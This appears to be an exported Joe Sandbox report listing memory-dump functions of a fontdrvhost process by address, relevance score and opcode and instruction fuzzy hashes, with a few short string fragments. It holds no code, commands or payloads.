Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d7c378455179903d981955e02e31dd89bc4a5d9182c6527ef380a1cb59b64e
Instruction ID: f471a439b2b97bf78c512239d1297bf7fa0764c88ab83be70cd51ea4d87a9c0a
Opcode Fuzzy Hash: b9d7c378455179903d981955e02e31dd89bc4a5d9182c6527ef380a1cb59b64e
Instruction Fuzzy Hash: 1552CE70A196499FDB6CCF68C4E86BD77A1FF58300F5041BDD45ECB29ACA78A981CB40

Function 00007FFD9B880E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb03a3e678020bedd6ebc18db5413cb3aac684b08aa3d9349607edf6904dade
Instruction ID: a90334cf380c6a565119e2165652ccc032cadc9058ef63719baafe0bf87fbb7f
Opcode Fuzzy Hash: 9fb03a3e678020bedd6ebc18db5413cb3aac684b08aa3d9349607edf6904dade
Instruction Fuzzy Hash: 8C51D2B5A28D4D8FE798EB9CC8697A97BE0EB9A314F5001BED019D73D9DBB814118300

Function 00007FFD9B880B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9B880B56
"s9, xrefs: 00007FFD9B880B46
!k9, xrefs: 00007FFD9B880B4E

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
Instruction ID: 07960ecc945c78fc3916653149dd8474f82545f6b37777317d9bb0e272078288
Opcode Fuzzy Hash: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
Instruction Fuzzy Hash: F6F0F43B728D0A8BC7016B3EB8805D57780EBD9636BD505BBD204CB261E2201C9E83E0

Function 00007FFD9BC73E28 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC73EA2

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d2cf73b7476ba05bea2307850b0ee1f4a5bef0982d26c65ade00c57166022935
Instruction ID: 7f7f3aa948465572a173a87dd154ebb1a12b950fd03c622b34b9b7f1f9010470
Opcode Fuzzy Hash: d2cf73b7476ba05bea2307850b0ee1f4a5bef0982d26c65ade00c57166022935
Instruction Fuzzy Hash: 97518E71E1950E8FDB58DBA8C4A55FDB7B1FF98300F1141BAD01EE7296CA342A02CB50

Function 00007FFD9BC791D8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC79252

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 81206ec655b87ef3e5806bb25f3477f1d01e05d546a69041ef971c94f3955f37
Instruction ID: 5e3eaa04f12b98087811db74bb5570539ced11660409f58c1f3717ffee576ffc
Opcode Fuzzy Hash: 81206ec655b87ef3e5806bb25f3477f1d01e05d546a69041ef971c94f3955f37
Instruction Fuzzy Hash: 08515A71E0954E9FDB59DBA8C4A95FCB7B1EF59300F1140BAC01EA72E2CA782A05CB50

Function 00007FFD9BC7409F Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d60c48eb0b8c499bd489a5a72c8d9e6c4203dbf72c752072f5a4ce32a69f0a
Instruction ID: 56c12f2ed83022b1d6967dc33d645b89b268b6511700bae912001531119b7c98
Opcode Fuzzy Hash: c0d60c48eb0b8c499bd489a5a72c8d9e6c4203dbf72c752072f5a4ce32a69f0a
Instruction Fuzzy Hash: D3F1E53061965A9FDB59CF68C4E16B83BA1FF45300B5545BDC84ECB29BCA38E982CB41

Function 00007FFD9BC7A491 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e31a926fe35e83a55c10b16e4cb9bf9e8b3166cb8d9516d7e05772d7a40bb06
Instruction ID: 34ca4949ac11320a61be320875d180109311d9519a971c84a043f1811ded5c43
Opcode Fuzzy Hash: 2e31a926fe35e83a55c10b16e4cb9bf9e8b3166cb8d9516d7e05772d7a40bb06
Instruction Fuzzy Hash: 3DD1F230A0EA4E8FD378DB78C4E557977E1FF44300B1545BEE48EC76A2DA29B9428B41

Function 00007FFD9BC740BF Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921a06e580b8eb56d843ac806224a5841d12dc1f31c6f146f1c4f13349a4ea9f
Instruction ID: 13c18238019ca10cfe489f045562e19b681a1f2a4581a167caca7027ca92d82c
Opcode Fuzzy Hash: 921a06e580b8eb56d843ac806224a5841d12dc1f31c6f146f1c4f13349a4ea9f
Instruction Fuzzy Hash: 92C1053061A55A9BEB2DCF68C4F15B83BA0FF45300B5545BDC88B8B69BCA38F542CB41

Function 00007FFD9BC73952 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b56749e516a14b9ba0642ce3ba11ea1e98f9eac7de4985f40e27da51c59c5d6
Instruction ID: 17d0e7ddf349c684bcd787f7cb8fd4b0b30c760966f020498b2e8df87815efe1
Opcode Fuzzy Hash: 7b56749e516a14b9ba0642ce3ba11ea1e98f9eac7de4985f40e27da51c59c5d6
Instruction Fuzzy Hash: 4AC1F67071D94A4FD359DB78C4A56B8BBA0FF85300F4541B9C44EC7A97DB28BA52C780

Function 00007FFD9BC7DEC2 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678c12080d129a4fba167e86ad6670a7323bfe8e69cc9c17295420001cfe6238
Instruction ID: 4c5db3544dd06499b97d59c88c761f31b040d6b43161d3c6439eaadc65741148
Opcode Fuzzy Hash: 678c12080d129a4fba167e86ad6670a7323bfe8e69cc9c17295420001cfe6238
Instruction Fuzzy Hash: FFC1E371B1DA4B4FE359DB68C0B16A8BBA1FF49300F4541B9D04EC7AA7DB28B951C780

Function 00007FFD9BC78D02 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9090ce4d91503c4cfb4d4b954cafac0d54301ef5ababfc451647db52a77fcae2
Instruction ID: 948983e13f462595477e2577838fb64e69e71fa4330728eb218232d47e36fdfa
Opcode Fuzzy Hash: 9090ce4d91503c4cfb4d4b954cafac0d54301ef5ababfc451647db52a77fcae2
Instruction Fuzzy Hash: BAC1163071EA4A4FE359DB79C4E16A8BBA1FF19300F4541B9C14EC7AA7CB28B951C781

Function 00007FFD9BC76767 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4fecef551eb56d8a1d990fccb0920548d133974f2ab6eb23e674f997495224
Instruction ID: b0dff5e7f593a566e6a38b868405596f44bdfe3f48dcd49f7c88fcf203522333
Opcode Fuzzy Hash: aa4fecef551eb56d8a1d990fccb0920548d133974f2ab6eb23e674f997495224
Instruction Fuzzy Hash: A4310C12F0F5AF86F23926F968B14FC6640DF51321F1A01B7E4ADC70E6DD4C2A495342

Function 00007FFD9BC7B881 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96818be7e7f15a4d2703d35271278f13263ee33329bda26aebdcfc03a09a92c6
Instruction ID: 9469dbde579f1eba2cf82d543565ab732822daaf3bc61c90910984dccfca522c
Opcode Fuzzy Hash: 96818be7e7f15a4d2703d35271278f13263ee33329bda26aebdcfc03a09a92c6
Instruction Fuzzy Hash: 0021E452F1E19B8AE73962B968B64BC3740EF41630F5A02FAD44E470EBDC4C3A819391

Function 00007FFD9BC7D3F6 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3dfbd5efca76b052e424cb0634d1fd1ae2712e100c8c59982bcfd965e91621
Instruction ID: d29ccc14fadccbbe73120f494b99485aafafa64b8a5c7a4ffbff013cfa0a9071
Opcode Fuzzy Hash: cd3dfbd5efca76b052e424cb0634d1fd1ae2712e100c8c59982bcfd965e91621
Instruction Fuzzy Hash: 1B8139B1B0EA4A4FE3789BB894A557977E0FF85314F1605BED08FC31A2DE2876028741

Function 00007FFD9BC78246 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02cc81bdee82dcee9097ad1d331dbe4ef2ee5aa32ca69bb2c7d9b055a2de127b
Instruction ID: 7f980c1a4b9e1a10c640805607a277d1e963db1b2ef77177b201049f5e1226bf
Opcode Fuzzy Hash: 02cc81bdee82dcee9097ad1d331dbe4ef2ee5aa32ca69bb2c7d9b055a2de127b
Instruction Fuzzy Hash: BF817A21B0EA4A4FE3789BB984B54B977E0FF46311B16057ED28FD31A2DE18B5028345

Function 00007FFD9BC72E94 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9530bf65d6abf51e0618a287d9ecc594861f7048d02a8dd631055f4717e4e52b
Instruction ID: 13a166f73fd76d697a969083521ad70da5fb230939afd8f62e120e4fb3cde40a
Opcode Fuzzy Hash: 9530bf65d6abf51e0618a287d9ecc594861f7048d02a8dd631055f4717e4e52b
Instruction Fuzzy Hash: E6813D31B0E64A4FE37C9AB894A55BD77E0EF86310B15057ED48FC71A2DE28BA038741

Function 00007FFD9BC76419 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35edcf0050cf6d7bc7a1bb2c86782be13e07db1ffd3fb82e4d25191fe15e7cf4
Instruction ID: fe5f34a84cc87dd75a7b05bc397f500953ff93c709ca9e7823cf0490986b750e
Opcode Fuzzy Hash: 35edcf0050cf6d7bc7a1bb2c86782be13e07db1ffd3fb82e4d25191fe15e7cf4
Instruction Fuzzy Hash: 92812831B0E54E4FE7B8DA7884A64BC37D0FF44310B1602B9F49EC75B6DE18AA169781

Function 00007FFD9BC76FDB Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226a74ace4f2acf4c13a48303effbae7361bca2ce51586e4ee9b4833a44d84db
Instruction ID: 2c99f090bbf9a7d4d1c277db951e79cf0fcbfd310675983957b0ac59a430b1e5
Opcode Fuzzy Hash: 226a74ace4f2acf4c13a48303effbae7361bca2ce51586e4ee9b4833a44d84db
Instruction Fuzzy Hash: EB81A130A1E64E8FEB65DBB488A1ABCBBE1FF49300F5105BAD00ED71E5DA2869418751

Function 00007FFD9BC7C0FB Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1606790132e3f475498a026b8d8f9fced30fe0f149149e6bedf667f629b88b6
Instruction ID: 599940eb21346bdc5bb6c60317130705eac6145b45ba08434d63b98e85cc6932
Opcode Fuzzy Hash: d1606790132e3f475498a026b8d8f9fced30fe0f149149e6bedf667f629b88b6
Instruction Fuzzy Hash: 8681D430E2E54F8FE7A5DBB888A56BE7BA1FF45301F5101BAD00ED71E5DA286A418701

Function 00007FFD9BC70FFD Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58a8cc00ea80fb3b633960d183f2e81a51893c204f0f013a0b25eb5bc847554
Instruction ID: 916f3fda03ce6810d9c63b91c6da0d39eef615dc342e28c807d13933432930e9
Opcode Fuzzy Hash: a58a8cc00ea80fb3b633960d183f2e81a51893c204f0f013a0b25eb5bc847554
Instruction Fuzzy Hash: B6713B35B1E58D4FE778DA7888A65BC77D0FF44310B0602B9D49ECB5B2DE18AA068741

Function 00007FFD9BC750E1 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4f8c2f77b8035ad442932a7572605801f4f7829a8f8d4e69cff7de21dab831
Instruction ID: d2404173708f1d008a27e3317fd9c53f9928f7c418edb8e5be754e5ccb3072d7
Opcode Fuzzy Hash: 9c4f8c2f77b8035ad442932a7572605801f4f7829a8f8d4e69cff7de21dab831
Instruction Fuzzy Hash: D361F130B1AB4A4FD3A9DB64C1E15B577E2FF45300B41497DC48A87AA2DB28F942CB80

Function 00007FFD9BC797E0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49035463db92fc6f97e47bd9649177b94defeac3c610b508e1500208e2e68516
Instruction ID: b84424e1c678dc2830d27670252a2139bcdcb9156a8eb83ba24dbd79b65a8ba6
Opcode Fuzzy Hash: 49035463db92fc6f97e47bd9649177b94defeac3c610b508e1500208e2e68516
Instruction Fuzzy Hash: 54513270E0D54E5EEBA89B6888B9AFCB7A1FF51300F4041FAC05EC7196DD786A818B41

Function 00007FFD9BC8F30E Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2917af21be47fe77235aee027627985f1d57b85d4285d29ee189863f479b3bda
Instruction ID: a6c614a484242a467696c1cb2c66f362888a0a76a4d0bb601e0506103e18c916
Opcode Fuzzy Hash: 2917af21be47fe77235aee027627985f1d57b85d4285d29ee189863f479b3bda
Instruction Fuzzy Hash: 2F412A57F0FA960EE726A7BCAC764E83B90DF91328B0905F7D0988F1D3E81969474291

Function 00007FFD9B88090D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4c6819457805e4731f67c3d5464265f0128604d6b706a38625d2b04cf8db97
Instruction ID: da52b92cc2667b342deffe6cc8ddc7cdc64b26b6d2293a275968e698429250e5
Opcode Fuzzy Hash: bf4c6819457805e4731f67c3d5464265f0128604d6b706a38625d2b04cf8db97
Instruction Fuzzy Hash: 15412B22B1CD695FE31DB7AC74A9AF977C1DF48325B0404BBD05DC71EBED68A8428284

Function 00007FFD9BC75707 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3153b9e29698eb65f90c5700c649f06e095bf0e9b7fa95e16898c3de1b35ddf
Instruction ID: 295c53bf7cc346b1b0a114cda31327d9e57e9c27407399b0f2b411545bd6b6e5
Opcode Fuzzy Hash: f3153b9e29698eb65f90c5700c649f06e095bf0e9b7fa95e16898c3de1b35ddf
Instruction Fuzzy Hash: F041A77160C9488FDF9CFF68C4A5EA477E1FBA8314B0541AAD00EC3196DE25F841CB41

Function 00007FFD9BC7AAB7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bccdeab51f2d767aa277c0a0459ebcd96346d20dba638133d283c63a707ce4fb
Instruction ID: 52c4c215e5771f715e31b0846d716f0f395e7f14034ad7c3b6bd6b18a002bf2a
Opcode Fuzzy Hash: bccdeab51f2d767aa277c0a0459ebcd96346d20dba638133d283c63a707ce4fb
Instruction Fuzzy Hash: F141717260C9488FDF9CFF68C4A5DA8B3E1FBA831471411AAD04EC71A6DE35E945CB81

Function 00007FFD9BC757B1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e0915450ad3452d49b718fc2af6977cbf570b108187c610fe406c94ad75ab7
Instruction ID: 32d4272d8cba2bbbbf95a867bf26be3d36397fd2f210cfbe426cfa959f4ee243
Opcode Fuzzy Hash: 46e0915450ad3452d49b718fc2af6977cbf570b108187c610fe406c94ad75ab7
Instruction Fuzzy Hash: 8C31827160CA488FDB9CFF28C4A5E6477E1FBA831470542AED44EC71A6DE25F881CB91

Function 00007FFD9BC7AB61 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94196166420f02e7133823b4e7b4ad0866cc94125d4d839965930b18f58df803
Instruction ID: 9e5fa4936365463edc3d6c070e16236cda487b35e4be9f0bb0bac6e536f8d14f
Opcode Fuzzy Hash: 94196166420f02e7133823b4e7b4ad0866cc94125d4d839965930b18f58df803
Instruction Fuzzy Hash: A931917160C9488FDB5DFF68C4A5EA473E1FBA831471411AED04AC71A6DE35F845CB81

Function 00007FFD9B880908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction ID: e996e6777afe14103f7e51a044a179589c6dbcc18bec8b7b984fa32859bab316
Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction Fuzzy Hash: 5A21B43130DC194FE768EB5CE88ADB973D1EF9932170501BAE59AC7136E921EC8287C1

Function 00007FFD9BC7574B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb7934531ac5a7a80cd3168f5ca558ba7be9b8557a4287204e7319a4ae6d879
Instruction ID: 4a3f606e194f8e9fe07b754a19142d76e9c446a8a0eafff866029914e585250e
Opcode Fuzzy Hash: fcb7934531ac5a7a80cd3168f5ca558ba7be9b8557a4287204e7319a4ae6d879
Instruction Fuzzy Hash: D831827160CA498FDB9CEF68C4A5EA477E1FBA831470542ADD04EC71A6DE25F881CB81

Function 00007FFD9BC7AAFB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f44424a70567ed0e724a2f3a71e5e352f84dce765a977f7fd38560fc4d8bbf
Instruction ID: 8da05ba8afc476b8f18f76f3c0c683a9f863376c32396bfb4d27b48b9539102d
Opcode Fuzzy Hash: 38f44424a70567ed0e724a2f3a71e5e352f84dce765a977f7fd38560fc4d8bbf
Instruction Fuzzy Hash: 2331827160C9488FDB5CFF68C4A5EA473E2FBA831071411AED04AC71A6DE35F845CB81

Function 00007FFD9BC786DE Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 150e0cffaa8f8371597bfed9afde9929b3bd66942f1f38dbae844ebb838a2239
Instruction ID: b14084d95796862f45afebc9afc491645c2b026c92263eabf43a21ffa36823ae
Opcode Fuzzy Hash: 150e0cffaa8f8371597bfed9afde9929b3bd66942f1f38dbae844ebb838a2239
Instruction Fuzzy Hash: 1F313530709A4A4FD7A4DF79C5A16E97BE1FF49310F04097ADA8AC36A2DB24F5158780

Function 00007FFD9BC7288B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b7ca1d3fc71dbd0e289e0fe98c22d63e419daaa93c5d426070193f66ff73eb
Instruction ID: db1387d629992f92a4a03da5a078273a09df2d0b768bd1e01a4fcec0dd1fed7f
Opcode Fuzzy Hash: 29b7ca1d3fc71dbd0e289e0fe98c22d63e419daaa93c5d426070193f66ff73eb
Instruction Fuzzy Hash: 8831C471B1A90E8FDB68EBACC4A29ACF7A1FF59310B054178D05ED7192CF24B912C740

Function 00007FFD9BC75515 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff52f015c2fb23d27b3e9e2711a5cf4ec878cf09c7a3d74f5b9b3302a5d14163
Instruction ID: a8f4236b0b346a3ccc50e750661d3367295d92fe6984d519a5d190391ea351c3
Opcode Fuzzy Hash: ff52f015c2fb23d27b3e9e2711a5cf4ec878cf09c7a3d74f5b9b3302a5d14163
Instruction Fuzzy Hash: 1931F970E1A54ECFEBA8DBA484A55BD7BB2FF54300F52017AD40ED71A1DA39BA408B41

Function 00007FFD9B880C25 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5474a09659f50daf5104413cb1963d813e6e6b6ac613e64df1b2516f382a2eb
Instruction ID: d18ff62ca6202984a557dc97752af53a118ba4efd40d5e661d64ed04cccae169
Opcode Fuzzy Hash: d5474a09659f50daf5104413cb1963d813e6e6b6ac613e64df1b2516f382a2eb
Instruction Fuzzy Hash: 50315B32B1DA4D8FE726ABA898251EC7760EF45324F0541F3D058CB1E3D9382A8A8751

Function 00007FFD9BC7A8C5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

